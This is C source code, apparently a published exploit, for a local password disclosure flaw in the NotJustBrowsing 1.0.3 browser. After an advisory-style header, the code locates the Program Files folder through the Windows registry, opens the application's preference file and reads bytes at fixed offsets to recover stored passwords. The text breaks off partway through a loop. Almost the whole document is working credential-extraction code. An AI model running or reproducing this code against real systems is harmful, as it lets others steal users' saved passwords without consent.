/***************************************************************** NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan Application: NotJustBrowsing 1.0.3 Procuder: www.notjustbrowsing.com Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords to local users. Discovered & Coded by Kozan Credits to ATmaCA www.netmagister.com - www.spyinstructors.com kozan@netmagister.com *****************************************************************/ #include #include HKEY hKey; #define BUFSIZE 100 char prgfiles[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; char *bilgi_oku(int adres,int uzunluk) { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0, KEY_QUERY_VALUE, &hKey ) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) { RegCloseKey(hKey); return NULL; } RegCloseKey(hKey); strcat(prgfiles,"\\NetLeaf Limited\\NotJustBrowsing\\notjustbrowsing.prf"); int i; FILE *fp; char ch[100]; if((fp=fopen(prgfiles,"rb")) == NULL) { return "NOTINSTALLED"; } fseek(fp,adres,0); for(i=0;i